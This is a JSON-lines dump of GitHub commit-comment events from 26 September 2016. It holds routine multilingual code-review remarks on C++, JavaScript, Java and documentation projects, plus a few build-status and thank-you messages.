{"id":"4620436550","type":"CommitCommentEvent","actor":{"login":"LiamC84"},"repo":{"name":"Looking4Group/L4G_Core"},"payload":{"comment":{"id":19179877,"position":null,"line":null,"path":null,"commit_id":"820f63a98c71841bdd6e79b955fe91c14421c0f1","created_at":"2016-09-26T21:05:34Z","updated_at":"2016-09-26T21:05:34Z","body":"Still not working.. can't see this NPC even though I've completed \"I See Dead Draenei\""}},"created_at":"2016-09-26T21:05:34Z"}
{"id":"4620438710","type":"CommitCommentEvent","actor":{"login":"davidsadan"},"repo":{"name":"davidsadan/blog-prova-edson-queiroz"},"payload":{"comment":{"id":19179885,"position":null,"line":null,"path":null,"commit_id":"45a82b6701716be9b5d057b655d245067fd7272d","created_at":"2016-09-26T21:05:58Z","updated_at":"2016-09-26T21:05:58Z","body":"@gilglecio, isso era uma prova para trabalhar em uma empresa daqui do Ceará, e eu estava correndo contra o tempo para entregar. Não estava dando certo enviar os arquivos normalmente, aí tive que zipar e mandar pra não perder seleção."}},"created_at":"2016-09-26T21:05:58Z"}
{"id":"4620439240","type":"CommitCommentEvent","actor":{"login":"AlekseyLebedev"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179886,"position":88,"line":88,"path":"PowerSpace/Editor/DrawableEditor.cpp","commit_id":"a6880ce8bb27bf4f82688a276a6da41acc68e99f","created_at":"2016-09-26T21:06:04Z","updated_at":"2016-09-26T21:06:04Z","body":"Да, так и есть"}},"created_at":"2016-09-26T21:06:04Z"}
{"id":"4620444593","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"distillpub/post--augmented-rnns"},"payload":{"comment":{"id":19179905,"position":null,"line":null,"path":null,"commit_id":"86964e18fd4c9b102547a00d82ae7280c8e831cc","created_at":"2016-09-26T21:07:04Z","updated_at":"2016-09-26T21:07:04Z","body":"Hey @shancarter, how did you create the illustration `rnn_attentional_ex3.html`?\r\nIt looks gorgeous, and I'm super curious to understand how you manage to build it up.\r\nDid you first draw it in Inkscape or Illustrator, and copied over some of the SVG styles and constructs?\r\nDo you have any tutorial you could reference?\r\n\r\nThank you!"}},"created_at":"2016-09-26T21:07:04Z"}
{"id":"4620444659","type":"CommitCommentEvent","actor":{"login":"elijahrockers"},"repo":{"name":"VUIIS/dax"},"payload":{"comment":{"id":19179906,"position":null,"line":null,"path":null,"commit_id":"51bc26d6f5e426bf587abb4bd47753565574a367","created_at":"2016-09-26T21:07:05Z","updated_at":"2016-09-26T21:07:05Z","body":"When I step through, at this point src_type == xnat:petScanData"}},"created_at":"2016-09-26T21:07:05Z"}
{"id":"4620449279","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19179919,"position":95,"line":95,"path":"PowerSpace/EventHandler/ScriptEngine.cpp","commit_id":"7102bf5faa9832fecb4988a27de8c4010a5b3d17","created_at":"2016-09-26T21:07:56Z","updated_at":"2016-09-26T21:07:56Z","body":"мы же зафиксировали Python3. Можно не поддерживать Python2 (с понятной диагностикой отказа)."}},"created_at":"2016-09-26T21:07:56Z"}
{"id":"4620451549","type":"CommitCommentEvent","actor":{"login":"smaloff"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19179923,"position":null,"line":null,"path":null,"commit_id":"927661f8ace022a0f77a35ea76dffb5bb21b188d","created_at":"2016-09-26T21:08:22Z","updated_at":"2016-09-26T21:08:22Z","body":"Awesome - nice job!  "}},"created_at":"2016-09-26T21:08:22Z"}
{"id":"4620453302","type":"CommitCommentEvent","actor":{"login":"jesperorb"},"repo":{"name":"jesperorb/storyteller-by-jesper-orb-fend16"},"payload":{"comment":{"id":19179931,"position":1,"line":1,"path":"1_tale_begins.txt","commit_id":"fe1e3e3572bf06189d2195ff9612e63e013e3a79","created_at":"2016-09-26T21:08:42Z","updated_at":"2016-09-26T21:08:42Z","body":"Wow!"}},"created_at":"2016-09-26T21:08:42Z"}
{"id":"4620456492","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"GoogleCloudPlatform/app-gradle-plugin"},"payload":{"comment":{"id":19179951,"position":null,"line":null,"path":null,"commit_id":"5769c73f457c0c1216696794374534fa053df6ac","created_at":"2016-09-26T21:09:17Z","updated_at":"2016-09-26T21:09:17Z","body":"LGTM"}},"created_at":"2016-09-26T21:09:17Z"}
{"id":"4620457173","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"distillpub/post--augmented-rnns"},"payload":{"comment":{"id":19179954,"position":null,"line":null,"path":null,"commit_id":"86964e18fd4c9b102547a00d82ae7280c8e831cc","created_at":"2016-09-26T21:09:26Z","updated_at":"2016-09-26T21:09:26Z","body":"OMG. You're the guy from the NewYork Time illustrations. I bow to you, my Lord! Haha! Your work is simply PERFECT."}},"created_at":"2016-09-26T21:09:26Z"}
{"id":"4620458122","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19179958,"position":null,"line":null,"path":null,"commit_id":"68c1c2abf985055add75ee9526e73e442902ef08","created_at":"2016-09-26T21:09:37Z","updated_at":"2016-09-26T21:09:37Z","body":"@CPS310Bot"}},"created_at":"2016-09-26T21:09:37Z"}
{"id":"4620458331","type":"CommitCommentEvent","actor":{"login":"codeZeilen"},"repo":{"name":"codeZeilen/got-things-done"},"payload":{"comment":{"id":19179960,"position":null,"line":null,"path":null,"commit_id":"18c133cfda7b9ed9c1be28fe24fdcd61d2e32618","created_at":"2016-09-26T21:09:40Z","updated_at":"2016-09-26T21:09:40Z","body":"These credentials are void by now."}},"created_at":"2016-09-26T21:09:40Z"}
{"id":"4620464600","type":"CommitCommentEvent","actor":{"login":"rbnpi"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":19179972,"position":null,"line":null,"path":null,"commit_id":"687fde45e88b1efe7ad7673971ba67ea4c73b6c3","created_at":"2016-09-26T21:10:48Z","updated_at":"2016-09-26T21:10:48Z","body":"Needs an entry in mainwindow.h\r\nI added ```    void runBufferIdx(int idx);``` which seemed to work...at least it compiles."}},"created_at":"2016-09-26T21:10:48Z"}
{"id":"4620466333","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19179976,"position":null,"line":null,"path":null,"commit_id":"ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2","created_at":"2016-09-26T21:11:07Z","updated_at":"2016-09-26T21:11:07Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2306 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.35%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T21:11:07Z"}
{"id":"4620468457","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19179981,"position":5,"line":5,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon.cpp","commit_id":"42428b98da9e42b678b7486c8f082566f291345b","created_at":"2016-09-26T21:11:31Z","updated_at":"2016-09-26T21:11:31Z","body":"настройте, пожалуйста, кодировку исходников, чтобы в GitHub было читаемо"}},"created_at":"2016-09-26T21:11:31Z"}
{"id":"4620472785","type":"CommitCommentEvent","actor":{"login":"sethp-jive"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19179995,"position":58,"line":55,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-26T21:12:21Z","updated_at":"2016-09-26T21:12:21Z","body":"Yeah, the setters wouldn't be called concurrently with a signer in our usage, here, but the internal `signerCache` was static which indicated to me that they expect many instances rather than one shared instance. \r\n\r\nI don't disagree re: the distraction – interacting with the AWS SDK tends not to produce the most concise code in my experience. It looks like someone has [implemented request signing against the `HttpClient` APIs directly](https://github.com/inreachventures/aws-signing-request-interceptor/blob/master/src/main/java/vc/inreach/aws/request/AWSSigningRequestInterceptor.java) (vs the layer of indirection imposed by the `AWS4Signer`). It seemed like a heavy thing to pull in a dependency for a single file, but maybe it's worth trying?"}},"created_at":"2016-09-26T21:12:21Z"}
{"id":"4620473066","type":"CommitCommentEvent","actor":{"login":"usineur"},"repo":{"name":"Cpasjuste/SDLPoP"},"payload":{"comment":{"id":19179998,"position":null,"line":null,"path":null,"commit_id":"8e79e86ec264ba7aaaff06cd1281f9229ce448f1","created_at":"2016-09-26T21:12:25Z","updated_at":"2016-09-26T21:12:25Z","body":"Hello Cpasjuste,\r\n\r\nI already made a port of SDLPoP for Vita. Here you can take a look if you want: https://github.com/usineur/SDLPoP-Vita\r\n\r\nRegards"}},"created_at":"2016-09-26T21:12:25Z"}
{"id":"4620475788","type":"CommitCommentEvent","actor":{"login":"Nimmermaer"},"repo":{"name":"Nimmermaer/challengeMee"},"payload":{"comment":{"id":19180005,"position":null,"line":null,"path":null,"commit_id":"56af0775f398d5d5b4a18d677343fc203e08bda3","created_at":"2016-09-26T21:12:57Z","updated_at":"2016-09-26T21:12:57Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Git: git@github.com:Nimmermaer/challengeMee.git](https://trello.com/c/KHg309TX/6-git-git-github-com-nimmermaer-challengemee-git)"}},"created_at":"2016-09-26T21:12:57Z"}
{"id":"4620481987","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19180017,"position":10,"line":5,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/main.cpp","commit_id":"489c65cc26f194b50cb1315e597452912d822c84","created_at":"2016-09-26T21:14:08Z","updated_at":"2016-09-26T21:14:08Z","body":"кто-то пришел к нам из Java или Python?\r\nна C++ это выглядит так:\r\n`ModuleHighlightingAndAutoCompleteon moduleHighlightingAndAutoCompleteon(\"keywords.config\");`"}},"created_at":"2016-09-26T21:14:08Z"}
{"id":"4620484728","type":"CommitCommentEvent","actor":{"login":"melvinsoft"},"repo":{"name":"appsembler/edx-platform"},"payload":{"comment":{"id":19180021,"position":null,"line":null,"path":null,"commit_id":"8798729c5d8c16213876c223427b54a3e9b74719","created_at":"2016-09-26T21:14:37Z","updated_at":"2016-09-26T21:14:37Z","body":"@bryanlandia No, I tweaked the code a little bit, because is a class method, based on, I created this standalone method. \r\nYes, we can factorize the code, Will do."}},"created_at":"2016-09-26T21:14:37Z"}
{"id":"4620485090","type":"CommitCommentEvent","actor":{"login":"tdas"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19180022,"position":157,"line":261,"path":"external/kafka-0-10-sql/src/main/scala/org/apache/spark/sql/kafka010/KafkaSourceProvider.scala","commit_id":"e1671525d142b249749fcd58d5d3bc325fc46c71","created_at":"2016-09-26T21:14:40Z","updated_at":"2016-09-26T21:14:40Z","body":"@marmbrus Any thoughts on the name \"app.auto.offset.reset\"?"}},"created_at":"2016-09-26T21:14:40Z"}
{"id":"4620486482","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19180023,"position":11,"line":6,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/main.cpp","commit_id":"489c65cc26f194b50cb1315e597452912d822c84","created_at":"2016-09-26T21:14:56Z","updated_at":"2016-09-26T21:14:56Z","body":"вопрос. Зачем \"неинициализированное\" состояние?"}},"created_at":"2016-09-26T21:14:56Z"}
{"id":"4620492748","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19180040,"position":8,"line":7,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon.cpp","commit_id":"489c65cc26f194b50cb1315e597452912d822c84","created_at":"2016-09-26T21:16:07Z","updated_at":"2016-09-26T21:16:07Z","body":"эта строка не нужна в C++. Конструктор по-умолчанию будет вызван даже до readFileKeywords"}},"created_at":"2016-09-26T21:16:07Z"}
{"id":"4620509030","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"jschwartzenberg/dosemu2"},"payload":{"comment":{"id":19180083,"position":null,"line":null,"path":null,"commit_id":"91c0e4214511c76ca391f660551eeea57dcc8c67","created_at":"2016-09-26T21:19:08Z","updated_at":"2016-09-26T21:19:08Z","body":"Where are the changes to autoemu.bat?\r\nD:\\DOS can of course work, but we really need\r\nto evaluate the advantages of having it on D\r\nand how we want to handle system-wide installs."}},"created_at":"2016-09-26T21:19:08Z"}
{"id":"4620518257","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19180115,"position":7,"line":7,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T21:20:51Z","updated_at":"2016-09-26T21:20:51Z","body":"вот тогда и добавить конструктор, нет?"}},"created_at":"2016-09-26T21:20:51Z"}
{"id":"4620519043","type":"CommitCommentEvent","actor":{"login":"Annpettway"},"repo":{"name":"Annpettway/Python-Video"},"payload":{"comment":{"id":19180121,"position":null,"line":null,"path":null,"commit_id":"cfe6e03919a1121d8945696d0f436bdab3adf867","created_at":"2016-09-26T21:21:00Z","updated_at":"2016-09-26T21:21:00Z","body":"okay, I will add a link of the Nice or Mean game."}},"created_at":"2016-09-26T21:21:00Z"}
{"id":"4620519891","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"zachgarman/rho_code_challenge_1"},"payload":{"comment":{"id":19180125,"position":16,"line":13,"path":"5-functions/func.js","commit_id":"433fe5a4aa5acae9f9a367f1f0b549e1c4c36f48","created_at":"2016-09-26T21:21:09Z","updated_at":"2016-09-26T21:21:09Z","body":"It is possible that this function could also take a number, so consider a less specific parameter name."}},"created_at":"2016-09-26T21:21:09Z"}
{"id":"4620521107","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19180127,"position":24,"line":24,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T21:21:23Z","updated_at":"2016-09-26T21:21:23Z","body":"дерево - да, а результат визита зачем на куче хранить?"}},"created_at":"2016-09-26T21:21:23Z"}
{"id":"4620528246","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19180141,"position":16,"line":16,"path":"plotter/MathPlotter/MathPlotter/PlotterWindow.cpp","commit_id":"a89b2892eaec4af4b8ca9793b8a099ace9746d7a","created_at":"2016-09-26T21:22:47Z","updated_at":"2016-09-26T21:22:47Z","body":"вот деструкторы вредно дополнять. Их вообще вредно самостоятельно писать"}},"created_at":"2016-09-26T21:22:47Z"}
{"id":"4620529028","type":"CommitCommentEvent","actor":{"login":"bgrainger"},"repo":{"name":"bgrainger/MySqlConnector"},"payload":{"comment":{"id":19180147,"position":16,"line":16,"path":"src/MySqlConnector/IOKind.cs","commit_id":"ae30b7f3b84dc62b0aeaa2619e18c63919a47f3c","created_at":"2016-09-26T21:22:55Z","updated_at":"2016-09-26T21:22:55Z","body":"delete"}},"created_at":"2016-09-26T21:22:55Z"}
{"id":"4620530138","type":"CommitCommentEvent","actor":{"login":"ValeriyKnyazhev"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19180150,"position":10,"line":5,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/main.cpp","commit_id":"489c65cc26f194b50cb1315e597452912d822c84","created_at":"2016-09-26T21:23:08Z","updated_at":"2016-09-26T21:23:08Z","body":"да, Java:)"}},"created_at":"2016-09-26T21:23:08Z"}
{"id":"4620534091","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"zachgarman/rho_code_challenge_1"},"payload":{"comment":{"id":19180161,"position":3,"line":2,"path":"5-functions/func.js","commit_id":"433fe5a4aa5acae9f9a367f1f0b549e1c4c36f48","created_at":"2016-09-26T21:23:53Z","updated_at":"2016-09-26T21:23:53Z","body":"It's not typical to have a function name with a number (though it is obviously valid JavaScript syntax)."}},"created_at":"2016-09-26T21:23:53Z"}
{"id":"4620534243","type":"CommitCommentEvent","actor":{"login":"cbm755"},"repo":{"name":"sympy/sympy-paper"},"payload":{"comment":{"id":19180162,"position":null,"line":null,"path":null,"commit_id":"9173c788871c1b9850f4d92f717d45ef21f60284","created_at":"2016-09-26T21:23:55Z","updated_at":"2016-09-26T21:23:55Z","body":"I guess so!  I hadn't thought about it.  If I come up with something different, I will do a PR."}},"created_at":"2016-09-26T21:23:55Z"}
{"id":"4620535615","type":"CommitCommentEvent","actor":{"login":"Annpettway"},"repo":{"name":"Annpettway/Python-Video"},"payload":{"comment":{"id":19180174,"position":null,"line":null,"path":null,"commit_id":"cfe6e03919a1121d8945696d0f436bdab3adf867","created_at":"2016-09-26T21:24:12Z","updated_at":"2016-09-26T21:24:12Z","body":"<a href=\"http://www.youtube.com/watch?feature=player_embedded&v=youtu.be/sVWpHa_sdeA\r\n\" target=\"_blank\"><img src=\"http://img.youtube.com/vi//youtu.be/sVWpHa_sdeA/0.jpg\" \r\nalt=\"The Nice or Mean Game\" width=\"240\" height=\"180\" border=\"10\" /></a>"}},"created_at":"2016-09-26T21:24:12Z"}
{"id":"4620537000","type":"CommitCommentEvent","actor":{"login":"araghunde"},"repo":{"name":"KalamaresFTW/PracticasDS"},"payload":{"comment":{"id":19180178,"position":21,"line":40,"path":"DS-34-11-B1/test/ejercicio2/UtilidadesFechaTest.java","commit_id":"05223497d202449aff9450e7a9c3f6f504354fe4","created_at":"2016-09-26T21:24:26Z","updated_at":"2016-09-26T21:24:26Z","body":"# ❗ 👀 \r\nPreguntar a semana que vén se se pode facer así.\r\nCundía non facer dous test para un método...\r\n![swag](https://cloud.githubusercontent.com/assets/3707802/18852348/52157788-8440-11e6-8064-e8d64e8b6b5f.gif)\r\n"}},"created_at":"2016-09-26T21:24:26Z"}
{"id":"4620537252","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ZatsepinMikhail/YaPyN_python"},"payload":{"comment":{"id":19180180,"position":5,"line":5,"path":"app/Interpretor/Project1/COverlappedWindow.h","commit_id":"f8b0ffd913a87f0ab206cab00ce9c1e5fbad799a","created_at":"2016-09-26T21:24:29Z","updated_at":"2016-09-26T21:24:29Z","body":"настройте кодировку, пожалуйста"}},"created_at":"2016-09-26T21:24:29Z"}
{"id":"4620539533","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ZatsepinMikhail/YaPyN_python"},"payload":{"comment":{"id":19180191,"position":6,"line":6,"path":"app/Interpretor/Project1/CPythonInterpretor.h","commit_id":"f8b0ffd913a87f0ab206cab00ce9c1e5fbad799a","created_at":"2016-09-26T21:24:55Z","updated_at":"2016-09-26T21:24:55Z","body":"виртуальный деструктор забыли"}},"created_at":"2016-09-26T21:24:55Z"}
{"id":"4620540722","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"dergraaf/library-builder"},"payload":{"comment":{"id":19180196,"position":56,"line":109,"path":"lbuild/environment.py","commit_id":"d0cd57f6571ffa95fe505ffccd2425ef700268ea","created_at":"2016-09-26T21:25:09Z","updated_at":"2016-09-26T21:25:09Z","body":"Should the filters really be part of `lbuild` or better `modm-platform`?"}},"created_at":"2016-09-26T21:25:09Z"}
{"id":"4620541700","type":"CommitCommentEvent","actor":{"login":"asmeurer"},"repo":{"name":"sympy/sympy-paper"},"payload":{"comment":{"id":19180200,"position":null,"line":null,"path":null,"commit_id":"9173c788871c1b9850f4d92f717d45ef21f60284","created_at":"2016-09-26T21:25:19Z","updated_at":"2016-09-26T21:25:19Z","body":"OK. Just wanted to make sure there wasn't a paper, and that citing \"The OctSymPy Developers\" is OK with you (I used the same format for all the other software citations). "}},"created_at":"2016-09-26T21:25:19Z"}
{"id":"4620543769","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ZatsepinMikhail/YaPyN_python"},"payload":{"comment":{"id":19180207,"position":1,"line":1,"path":"app/Interpretor/Project1/Debug/Project1.log","commit_id":"36236b9d9ae2e339085ee6124661303a533081da","created_at":"2016-09-26T21:25:41Z","updated_at":"2016-09-26T21:25:41Z","body":"логи в коммитах )"}},"created_at":"2016-09-26T21:25:41Z"}
{"id":"4620549157","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ZatsepinMikhail/YaPyN_python"},"payload":{"comment":{"id":19180236,"position":53,"line":53,"path":"app/Interpretor/Project1/CPythonInterpretor.cpp","commit_id":"f77d0140273ffdfd000569bc5785648d35c7aee2","created_at":"2016-09-26T21:26:43Z","updated_at":"2016-09-26T21:26:43Z","body":"hardcode"}},"created_at":"2016-09-26T21:26:43Z"}
{"id":"4620549236","type":"CommitCommentEvent","actor":{"login":"onitake"},"repo":{"name":"onitake/Uranium"},"payload":{"comment":{"id":19180238,"position":null,"line":null,"path":null,"commit_id":"d93728665b83766ea96a2ba89eec2dc3725705c9","created_at":"2016-09-26T21:26:44Z","updated_at":"2016-09-26T21:26:44Z","body":"Because it's much simpler to work with this way.\r\n\r\nLintian has spat out quite a few problems, and IMHO it's much easier to build and work in-tree.\r\nThat doesn't mean I'm going to keep things as they are, but once everything is accounted for, I'm fine with any means to keep the Debian tree.\r\n\r\nIt may even be an option to move debian/ back into the official repository, if the Cura developers allow it, and the changelog is kept up to date.\r\n\r\nI apologize if it seems like I'm just 'stealing' stuff here. In fact, I'm trying to understand how the build process works by adding everything in little bits, while applying improvements here and there."}},"created_at":"2016-09-26T21:26:44Z"}
{"id":"4620549505","type":"CommitCommentEvent","actor":{"login":"mrmlnc"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":19180241,"position":5,"line":187,"path":"release-notes/v1_6.md","commit_id":"3f08a8db4339f2f5642c2f8c26866d96b8e50773","created_at":"2016-09-26T21:26:47Z","updated_at":"2016-09-26T21:26:47Z","body":"May be better to use the official name `macOS`? 🐱 \r\n\r\n![image](https://cloud.githubusercontent.com/assets/7034281/18852424/05d13408-8449-11e6-953f-5133d9730c6c.png)\r\n"}},"created_at":"2016-09-26T21:26:47Z"}
{"id":"4620550241","type":"CommitCommentEvent","actor":{"login":"sethp-jive"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19180245,"position":58,"line":55,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-26T21:26:55Z","updated_at":"2016-09-26T21:26:55Z","body":"Disregard that last – just saw your awesome re-implementation work in #1312 . "}},"created_at":"2016-09-26T21:26:55Z"}
{"id":"4620550627","type":"CommitCommentEvent","actor":{"login":"jschwartzenberg"},"repo":{"name":"jschwartzenberg/dosemu2"},"payload":{"comment":{"id":19180250,"position":null,"line":null,"path":null,"commit_id":"840b1be2010a14aa0d1c95481393517b9c6a151e","created_at":"2016-09-26T21:26:59Z","updated_at":"2016-09-26T21:26:59Z","body":"Forgot the autoemu.bat changes, here they are."}},"created_at":"2016-09-26T21:26:59Z"}
{"id":"4620556294","type":"CommitCommentEvent","actor":{"login":"jodygarnett"},"repo":{"name":"geotools/geotools"},"payload":{"comment":{"id":19180273,"position":37,"line":37,"path":"modules/library/main/src/main/java/org/geotools/xml/NoExternalEntityResolver.java","commit_id":"c4bc0d489be8fb7f42150c94a2e4190945421e5d","created_at":"2016-09-26T21:28:06Z","updated_at":"2016-09-26T21:28:06Z","body":"Consider making EntityResolver2 to cover addition resolution method?"}},"created_at":"2016-09-26T21:28:06Z"}
{"id":"4620558392","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"ImJustVon/rho_code_challenge_1"},"payload":{"comment":{"id":19180279,"position":11,"line":8,"path":"1-variables/operators.js","commit_id":"489949e73d5b42ca99451d1d9d4e892c986f7433","created_at":"2016-09-26T21:28:29Z","updated_at":"2016-09-26T21:28:29Z","body":"What we were expecting was an equality check like\r\n`console.log('peeps = pie?', peeps == pi);`"}},"created_at":"2016-09-26T21:28:29Z"}
{"id":"4620559517","type":"CommitCommentEvent","actor":{"login":"hugoShaka"},"repo":{"name":"supelec-lstm/PinaPL"},"payload":{"comment":{"id":19180280,"position":null,"line":null,"path":null,"commit_id":"2586f4c0debd61d141c777b27e70a16dba40dfbf","created_at":"2016-09-26T21:28:42Z","updated_at":"2016-09-26T21:28:42Z","body":"![*facepalm*](http://www.bluehogreport.com/wp-content/uploads/facepalm.jpg \"facepalm\")"}},"created_at":"2016-09-26T21:28:42Z"}
{"id":"4620560501","type":"CommitCommentEvent","actor":{"login":"jodygarnett"},"repo":{"name":"geotools/geotools"},"payload":{"comment":{"id":19180282,"position":57,"line":57,"path":"modules/library/main/src/main/java/org/geotools/xml/NoExternalEntityResolver.java","commit_id":"c4bc0d489be8fb7f42150c94a2e4190945421e5d","created_at":"2016-09-26T21:28:54Z","updated_at":"2016-09-26T21:28:54Z","body":"I do not see https in the regex?"}},"created_at":"2016-09-26T21:28:54Z"}
{"id":"4620566007","type":"CommitCommentEvent","actor":{"login":"durack1"},"repo":{"name":"PCMDI/obs4MIPs-cmor-tables"},"payload":{"comment":{"id":19180294,"position":null,"line":null,"path":null,"commit_id":"8e92786a2cfa629bf805fd4bea446bab086c8728","created_at":"2016-09-26T21:30:00Z","updated_at":"2016-09-26T21:30:00Z","body":"@gleckler1 @taylor13 fine with me.. The easier to read/follow the better - should we pull this across to CMIP6_CVs?"}},"created_at":"2016-09-26T21:30:00Z"}
{"id":"4620566454","type":"CommitCommentEvent","actor":{"login":"jodygarnett"},"repo":{"name":"geotools/geotools"},"payload":{"comment":{"id":19180297,"position":58,"line":58,"path":"modules/library/main/src/main/java/org/geotools/xml/NoExternalEntityResolver.java","commit_id":"c4bc0d489be8fb7f42150c94a2e4190945421e5d","created_at":"2016-09-26T21:30:05Z","updated_at":"2016-09-26T21:30:05Z","body":"I am not sure if returning null manages to stop resolution, think it just hands it over to default behaviour. \r\n\r\nThe example I found in the old parser returned an empty input stream to block further resolution attempts."}},"created_at":"2016-09-26T21:30:05Z"}
{"id":"4620567410","type":"CommitCommentEvent","actor":{"login":"tritoch"},"repo":{"name":"tritoch/dr4ft"},"payload":{"comment":{"id":19180299,"position":62,"line":366,"path":"src/make/cards.js","commit_id":"c16ce855681ba8f24ac0a6e078f89af55487abdf","created_at":"2016-09-26T21:30:16Z","updated_at":"2016-09-26T21:30:16Z","body":"If AllSets.json has a 'url' field, use that for the card image source. makes spoilers easier."}},"created_at":"2016-09-26T21:30:16Z"}
{"id":"4620568802","type":"CommitCommentEvent","actor":{"login":"cbm755"},"repo":{"name":"sympy/sympy-paper"},"payload":{"comment":{"id":19180308,"position":null,"line":null,"path":null,"commit_id":"9173c788871c1b9850f4d92f717d45ef21f60284","created_at":"2016-09-26T21:30:30Z","updated_at":"2016-09-26T21:30:30Z","body":"No, no paper yet.  Now, I just realized this is your paper, not the sympy repo.\r\n\r\nMaybe it should say \"GNU Octave\" somewhere.   Also, I've kinda of been de-emphasizing the `OctSymPy` branding ever since it became *the* Symbolic Package for Octave.\r\n\r\nHow about:\r\n````\r\nAuthor = {{The Symbolic Package Developers}},\r\ntitle = {The Symbolic Package for GNU Octave}\r\nurl = {http://octave.sourceforge.net/symbolic}\r\n````\r\n"}},"created_at":"2016-09-26T21:30:30Z"}
{"id":"4620570145","type":"CommitCommentEvent","actor":{"login":"catolicasc"},"repo":{"name":"juninhoall/Curriculo"},"payload":{"comment":{"id":19180313,"position":null,"line":null,"path":null,"commit_id":"7f25a447e2d6e189aa6fdd70347022228856c7fa","created_at":"2016-09-26T21:30:44Z","updated_at":"2016-09-26T21:30:44Z","body":"esse"}},"created_at":"2016-09-26T21:30:44Z"}
{"id":"4620571921","type":"CommitCommentEvent","actor":{"login":"tritoch"},"repo":{"name":"tritoch/dr4ft"},"payload":{"comment":{"id":19180318,"position":24,"line":55,"path":"src/pool.js","commit_id":"c16ce855681ba8f24ac0a6e078f89af55487abdf","created_at":"2016-09-26T21:31:05Z","updated_at":"2016-09-26T21:31:05Z","body":"needs disabled"}},"created_at":"2016-09-26T21:31:05Z"}
{"id":"4620573150","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"ImJustVon/rho_code_challenge_1"},"payload":{"comment":{"id":19180323,"position":22,"line":25,"path":"6-objects/literal.js","commit_id":"489949e73d5b42ca99451d1d9d4e892c986f7433","created_at":"2016-09-26T21:31:18Z","updated_at":"2016-09-26T21:31:18Z","body":"Nice attention to detail on the address formatting!"}},"created_at":"2016-09-26T21:31:18Z"}
